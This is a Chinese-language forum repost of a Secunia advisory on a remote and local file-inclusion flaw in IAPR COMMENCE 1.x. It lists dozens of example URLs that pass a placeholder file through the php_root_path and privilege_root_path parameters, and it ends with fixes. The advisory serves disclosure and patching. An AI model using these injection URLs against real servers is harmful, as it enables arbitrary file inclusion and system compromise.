pioneer
超级版主
       
积分 4563
发帖 4545
注册 2007-7-16 来自 BJ
|
#1 IAPR COMMENCE包含文件时的漏洞
来源
secunia.com
软件名
IAPR COMMENCE 1.x
描述
这可恶意危害有漏洞的系统
在多种脚本下输入的"php_root_path"和"privilege_root_path"参数在用户包含文件前没有被准确过滤,这可从本地和外部资源中包含任意文件
例子:
http://[host]/Commence/includes/db_connect.php?php_root_path=[file]
http://[host]/Commence/includes/include_all_fns.php?php_root_path=[file]
http://[host]/Commence/includes/main_fns.php?php_root_path=[file]
http://[host]/Commence/includes/output_fns.php?php_root_path=[file]
http://[host]/Commence/includes/user_authen_fns.php?php_root_path=[file]
http://[host]/Commence/admin/includes/include_all_fns.php?php_root_path=[file]
http://[host]/Commence/admin/phase/include_all_phase.php?php_root_path=[file]
http://[host]/Commence/admin/phase/phase1.php?php_root_path=[file]
http://[host]/Commence/admin/phase/phase1.php?privilege_root_path=[file]
http://[host]/Commence/admin/phase/phase2.php?php_root_path=[file]
http://[host]/Commence/admin/phase/phase2.php?privilege_root_path=[file]
http://[host]/Commence/admin/phase/phase3.php?php_root_path=[file]
http://[host]/Commence/admin/phase/phase3.php?privilege_root_path=[file]
http://[host]/Commence/admin/phase/phase4.php?php_root_path=[file]
http://[host]/Commence/admin/phase/phase4.php?privilege_root_path=[file]
http://[host]/Commence/admin/phase/phasebase.php?php_root_path=[file]
http://[host]/Commence/includes/page_includes/page.php?php_root_path=[file]
http://[host]/Commence/includes/page_includes/pagebase.php?php_root_path=[file]
http://[host]/Commence/reviewer/includes/include_all_fns.php?php_root_path=[file]
http://[host]/Commence/reviewer/phase/include_all_phase.php?php_root_path=[file]
http://[host]/Commence/includes/page_includes/pagebase.php?php_root_path=[file]
http://[host]/Commence/reviewer/phase/phase1.php?php_root_path=[file]
http://[host]/Commence/reviewer/phase/phase1.php?privilege_root_path=[file]
http://[host]/Commence/reviewer/phase/phase2.php?php_root_path=[file]
http://[host]/Commence/reviewer/phase/phase2.php?privilege_root_path=[file]
http://[host]/Commence/reviewer/phase/phase3.php?php_root_path=[file]
http://[host]/Commence/reviewer/phase/phase3.php?privilege_root_path=[file]
http://[host]/Commence/reviewer/phase/phase4.php?php_root_path=[file]
http://[host]/Commence/reviewer/phase/phase4.php?privilege_root_path=[file]
http://[host]/Commence/reviewer/phase/phasebase.php?php_root_path=[file]
http://[host]/Commence/user/phase/include_all_phase.php?php_root_path=[file]
http://[host]/Commence/user/phase/phase1.php?php_root_path=[file]
http://[host]/Commence/user/phase/phase2.php?php_root_path=[file]
http://[host]/Commence/user/phase/phase3.php?php_root_path=[file]
http://[host]/Commence/user/phase/phase4.php?php_root_path=[file]
http://[host]/Commence/user/phase/phasebase.php?php_root_path=[file]
成功利用需要"register_globals"可用
该漏洞在version 1.3中已经确认,其它版本可能也受到影响
解决方案
编辑源代码确保充分过滤
设置"register_globals"为"Off"
[ Last edited by pioneer on 2007-11-28 at 14:17 ]
|
※文章所有权归【pioneer】与【东方微点论坛】共同所有,转载请注明出处!※
|
 |
|